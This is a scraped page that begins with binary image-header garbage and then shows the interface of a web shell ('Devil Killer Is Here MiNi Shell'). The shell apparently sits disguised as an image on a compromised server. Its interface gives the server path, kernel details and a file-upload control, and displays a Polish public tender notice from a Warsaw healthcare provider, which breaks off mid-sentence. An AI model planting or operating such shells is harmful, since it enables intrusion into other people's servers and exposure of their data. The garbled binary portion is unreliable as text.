JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230621/0026875201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi Inżyniera Kontraktu w ramach projektu pn: dostosowanie systemów informatycznych oraz infrastruktury do rosnących potrzeb w obszarze dokumentacji zdarzeń medycznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej Warszawa Wola-Śródmieście</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001018396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ciołka 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-445</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">monika.kuc@zozwola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zozwola.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi Inżyniera Kontraktu w ramach projektu pn: dostosowanie systemów informatycznych oraz infrastruktury do rosnących potrzeb w obszarze dokumentacji zdarzeń medycznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9c0a8f7a-1006-11ee-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00268752</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zozwolasrodmiescie.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zozwolasrodmiescie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu platformy zakupowej.<br/>1.	W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji za pośrednictwem Platformy w zakładce „Korespondencja”.<br/>2. Zamawiający, zgodnie z § 3 ust. 3 ww. Rozporządzenia określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>3.Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>6.2.	Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>6.3.	Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>6.4.	Włączona obsługa JavaScript;<br/>6.5.	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>7.	Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>8.	Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>8.1.	Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>9.	Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowo opisane w rozdziale II SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowo opisane w rozdziale II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">31/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> OPIS PRZEDMIOTU ZAMÓWIENIA<br/>I. INFORMACJE O PROJEKCIE<br/>Przedmiotem zamówienia jest świadczenie usługi Inżyniera Kontraktu (IK) w ramach projektu pn. dostosowanie systemów informatycznych oraz infrastruktury do rosnących potrzeb w obszarze dokumentacji zdarzeń medycznych, integracji z systemami centralnymi, obowiązków w zakresie wytwarzania EDM oraz konieczności zachowania bezpieczeństwa danych pacjentów.<br/>Samodzielny Publiczny Zakład Opieki Zdrowotnej Warszawa Wola-Śródmieście (dalej „Zespół” lub „Zamawiający”) jest publicznym zakładem opieki zdrowotnej, którego organem założycielskim jest miasto stołeczne Warszawa, udzielającym świadczeń opieki zdrowotnej od 1992 roku. Misją Zakładu jest świadczenie usług medycznych wysokiej jakości i promocja zdrowia.<br/>W skład zespołu wchodzi 13 przychodni lekarskich rozmieszczonych na terenie dwóch dzielnic m.st Warszawy: Woli i Śródmieścia. W tych przychodniach udzielane są świadczenia opieki zdrowotnej w zakresie:<br/>•	podstawowej opieki zdrowotnej,<br/>•	ambulatoryjnej opieki specjalistycznej,<br/>•	rehabilitacji leczniczej,<br/>•	leczenia stomatologicznego,<br/>•	medycyny pracy,<br/>•	profilaktyki i promocji zdrowia,<br/>•	psychiatrii i leczenia uzależnienia od alkoholu,<br/>•	diagnostyki obrazowej,<br/>•	diagnostyki laboratoryjnej.<br/>Zamawiający korzysta na dzień dzisiejszy z oprogramowania wspomagającego jego pracę merytoryczną (w tym w zakresie tworzenia i prowadzenia Elektronicznej Dokumentacji Medycznej), do którego posiada niewyłączną, nieograniczoną w czasie oraz nieograniczoną terytorialnie licencję. <br/>Zamawiający rozważa zakup (udzielenie licencji) nowego oprogramowania z uwagi na konieczność dostosowania swoich systemów informatycznych oraz infrastruktury informatycznej do rosnących potrzeb w obszarze dokumentacji zdarzeń medycznych, integracji z systemami centralnymi, obowiązków w zakresie wytwarzania EDM oraz konieczności zachowania bezpieczeństwa danych pacjentów („Projekt”). <br/>Zamawiający zamierza w sposób systematyczny powiększyć możliwości:<br/>•	realizacji spraw pacjentów bez konieczności fizycznej obecności w przychodni,<br/>•	najlepszego zabezpieczenia wytworzonej dokumentacji medycznej,<br/>•	automatyzacji wymiany informacji z współpracującymi podmiotami świadczącymi usługi dla Zespołu oraz wchodzących w jego skład przychodni, w tym w szczególności zautomatyzowania integracji ze współpracującymi laboratoriami.<br/>Zakres prac IK został podzielony na dwie części:<br/>1)	podstawową - obejmującą ocenę dotychczasowych zasobów informatycznych Zamawiającego, jego potrzeb w tym zakresie oraz przedstawienie rekomendacji co do ewentualnych zmian na przyszłość (część II ust. 6, pkt 1-5 OPZ),<br/>2)	opcjonalną – w przypadku akceptacji przez Zamawiającego rekomendacji Wykonawcy w zakresie modelu udzielania zamówień publicznych (część II ust. 6 pkt 5 OPZ) oraz posiadania odpowiednich zasobów finansowych na pokrycie kosztów nabycia nowego oprogramowania wraz z niezbędną infrastrukturą informatyczną – obejmującą: opracowanie dokumentacji na potrzeby zamówień publicznych w ramach Projektu, wraz z zapewnieniem wsparcia w procesie kontraktowania (udział w pracach komisji, odpowiedzi na pytania) - część II ust. 6 pkt 6 oraz pkt 7-8 (z poniższym zastrzeżeniem).<br/>Jednocześnie Wykonawca zobowiązany jest do wsparcia Zamawiającego, w tym do udzielania informacji niezbędnych do monitorowania Projektu udzielanie, przez cały okres obowiązywania umowy (maksymalnie do 12 miesięcy, w przypadku skorzystania z prawa opcji, a w przypadku nieskorzystania z prawa opcji, do czasu realizacji części podstawowej zamówienia) - część II ust. 6 pkt 7-8 OPZ.<br/>II. POSTANOWIENIA OGÓLNE<br/>1.	IK będzie zarządzać Projektem w porozumieniu z Zamawiającym.<br/>2.	IK zobowiązany jest wykonywać przedmiot zamówienia z należytą starannością, terminowo, zgodnie z obowiązującymi przepisami prawa krajowego i wspólnotowego oraz decyzją o realizacji Projektu.<br/>3.	IK zobowiązany jest wykonać przedmiot zamówienia zgodnie z wytycznymi, instrukcjami, podręcznikami i innymi dokumentami obowiązującymi Zamawiającego. <br/>4.	IK zobowiązany jest do wsparcia Zamawiającego we wszystkich obszarach związanych z realizacją Projektu oraz do zapewnienia spójnej metodologii pracy tak by w efekcie wykonywania zadań przez IK uzyskać skuteczne zarządzanie Projektem, sprawniejsze reagowanie na występujące zmiany i zagrożenia, sprawny przepływ informacji pomiędzy Zamawiającym a Wykonawcą/Wykonawcami, oraz koordynację działań.<br/>5.	IK zobowiązany jest świadczyć usługi w siedzibie swojej, Zamawiającego oraz miejscach realizacji Projektu, w szczególności zapewnić obecność osób przeznaczonych do realizacji zamówienia w odpowiedzi na żądanie zgłoszone przez Zamawiającego.<br/>6.	Zakres prac IK:<br/>1)	Analiza zasobów informatycznych posiadanych przez Zamawiającego, w następujących placówkach:<br/>a)	Samodzielny Publiczny Zakład Opieki Zdrowotnej Warszawa Wola-Śródmieście<br/>b)	Przychodnie Zakładu<br/>CHMIELNA 14<br/>CIOŁKA 11<br/>DRAGONÓW 6A<br/>ELEKCYJNA 54<br/>GRZYBOWSKA 34<br/>LESZNO 17<br/>MARIAŃSKA 1<br/>MIEDZIANA 2<br/>NOWOLIPIE 31<br/>OBOZOWA 63/65<br/>PŁOCKA 49<br/>SZLENKIERÓW 10<br/>ŻYTNIA 39<br/>obejmująca w szczególności:<br/>-posiadane systemy informatyczne, zakres danych,<br/>-posiadaną infrastrukturę sieciową i serwerową,<br/>-licencje na systemy informatyczne, dziedzinowe i standardowe, ze wskazaniem, czy pozwalają na realizację obowiązków wynikających z przepisów prawa,<br/>-umowy serwisowe / utrzymaniowe, ze wskazaniem ich zakresu i terminów realizacji,<br/>-ocena systemów i procedur stosowanych dla zabezpieczenia danych pacjentów, na podstawie audytów wcześniej przeprowadzanych na zlecenie Zamawiającego,<br/>-umowy z podmiotami świadczącymi usługi dla Zespołu oraz wchodzących w jego skład przychodni, w ramach których wymieniane są dane pacjentów, w tym w szczególności laboratoriów zewnętrznych,<br/>•	w terminie do 45 dni kalendarzowych od dnia zawarcia Umowy;<br/>2)	analiza potrzeb informatycznych Zamawiającego:<br/>a)	w obszarze systemów informatycznych wspierających świadczenie usług przychodni, e–usług jak i integracji z systemami centralnymi oraz z systemami podmiotów współpracujących,<br/>b)	w obszarze infrastruktury informatycznej niezbędnej dla wydajnej pracy systemów oraz dla zapewnienia bezpieczeństwa systemów i danych pacjentów w nich zawartych,<br/>•	w terminie do 45 dni kalendarzowych od dnia zawarcia Umowy,<br/>3)	przeprowadzenie analizy rynku w zakresie dostępnych systemów informatycznych, o których mowa w pkt 2 powyżej, oraz prezentacja Zamawiającemu wybranych (minimum trzech) takich systemów informatycznych<br/>4)	opracowanie rekomendacji w zakresie sposobu realizacji potrzeb zdefiniowanych w wyniku przeprowadzonej analizy ze szczególnym uwzględnieniem rekomendacji odnośnie modelu zakupu systemów przychodnianych i ich wspólnej platformy lub też jednego wspólnego systemu dla wszystkich placówek - w terminie do 45 dni kalendarzowych od dnia zawarcia Umowy,<br/>5)	przygotowanie szacunkowej wyceny niezbędnych inwestycji - w terminie do 45 dni od dnia zawarcia Umowy,<br/>6)	przygotowanie rekomendacji w zakresie modelu udzielania zamówień publicznych, w tym liczby i zakresu poszczególnych zamówień wraz ze stosownym uzasadnieniem, przy czym Zamawiający ogranicza maksymalną liczbę potencjalnych zamówień do 15, w terminie do 45 dni od dnia zawarcia Umowy,<br/>7)	opracowanie dokumentacji na potrzeby zamówień publicznych w ramach Projektu, wraz z zapewnieniem wsparcia w procesie kontraktowania (udział w pracach komisji, odpowiedzi na pytania) – w terminie do 60 dni kalendarzowych od daty przyjęcia i akceptacji przez Zamawiającego dokumentacji, o której mowa w pkt 1-5, <br/>8)	wsparcie Zamawiającego w realizacji Projektu w czasie realizacji Umowy – w okresie obowiązywania Umowy – w okresie 12 miesięcy od dnia zawarcia Umowy,<br/>9)	udzielanie informacji niezbędnych do monitorowania Projektu – w okresie obowiązywania Umowy – w okresie 12 miesięcy od dnia zawarcia Umowy<br/>-z tym, że zakres prac wskazany w pkt 6-8 powyżej, objęty jest zakresem prawa opcji (z zastrzeżeniem wskazanym w części I in fine).<br/>Zamawiający zleci jego realizację w przypadku łącznego spełnienia następujących warunków:<br/>a)	akceptacji przez Zamawiającego rekomendacji w zakresie modelu udzielania zamówień publicznych, o której mowa w pkt 5 powyżej, <br/>b)	dysponowania przez Zamawiającego odpowiednimi środkami finansowymi umożliwiającymi pokrycie kosztów tych zamówień w ramach Projektu oraz <br/>c)	podjęcia decyzji o przygotowaniu procedury lub procedur przetargowych w celu realizacji Projektu.<br/> <br/>III. OBOWIĄZKI IK W ZAKRESIE ZARZĄDZANIA RYZYKIEM<br/>IK zobowiązany jest do zarządzania ryzykiem w realizacji projektu:<br/>1)	identyfikowania, analizy, monitorowania i raportowania ryzyk oraz oceny ich wpływu na realizację Projektu,<br/>2)	opracowanie i aktualizacja rejestru ryzyk, będącego elementem Raportów Miesięcznych,<br/>3)	opracowania planu działań zapobiegawczych,<br/>4)	opracowanie propozycji działań naprawczych,<br/>5)	wdrożenie działań naprawczych po akceptacji Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79421100-2 - Usługi nadzoru nad projektem inne niż w zakresie robot budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72222200-9 - Usługi w zakresie systemów informacji lub usługi w zakresie planowania technologii</p> <p class="mb-0">72224000-1 - Usługi doradcze w zakresie zarządzania projektem</p> <p class="mb-0">72220000-3 - Usługi doradcze w zakresie systemów i doradztwo techniczne</p> <p class="mb-0">72242000-3 - Usługi modelowania projektu</p> <p class="mb-0">72224100-2 - Usługi w zakresie planowania wdrażania systemu</p> <p class="mb-0">72246000-1 - Usługi doradcze w zakresie systemów</p> <p class="mb-0">72228000-9 - Usługi doradcze w zakresie integrowania urządzeń komputerowych</p> <p class="mb-0">72226000-5 - Usługi doradcze w zakresie badań odbiorczych oprogramowania systemowego</p> <p class="mb-0">72100000-6 - Usługi doradcze w zakresie sprzętu komputerowego</p> <p class="mb-0">72140000-8 - Usługi doradcze w zakresie badań odbiorczych sprzętu komputerowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 9.	Zamawiający przewiduje zastosowanie prawa opcji. Zgodnie z art. 441 ustawy p.z.p. „Zamawiający może skorzystać z opcji, jeżeli przewidział ją w ogłoszeniu o zamówieniu lub w dokumentach zamówienia w postaci zrozumiałych, precyzyjnych i jednoznacznych postanowień umownych. Postanowienia te muszą przy tym spełniać łącznie następujące warunki: <br/>- określać rodzaj i maksymalną wartość opcji; <br/>- określać okoliczności skorzystania z opcji; <br/>- nie modyfikować ogólnego charakteru umowy”. <br/>Szczegółowe zagadnienia dotyczące okoliczności skorzystania z prawa opcji przewidziane zostały we wzorze umowy, stanowiącym Załącznik nr 5 do SWZ oraz OPZ. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Szczegółowo opisane we wzorze umowy stanowiącym załącznik nr 5 do SWZ</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zespół</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rekomendacje</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ, którzy nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835 z późn. zm.) oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 2 000 000,00 złotych (słownie: dwa miliony złotych).<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej jeśli wykaże, że:<br/>1)	posiada doświadczenie w zakresie stanowiącym przedmiot zamówienia, a 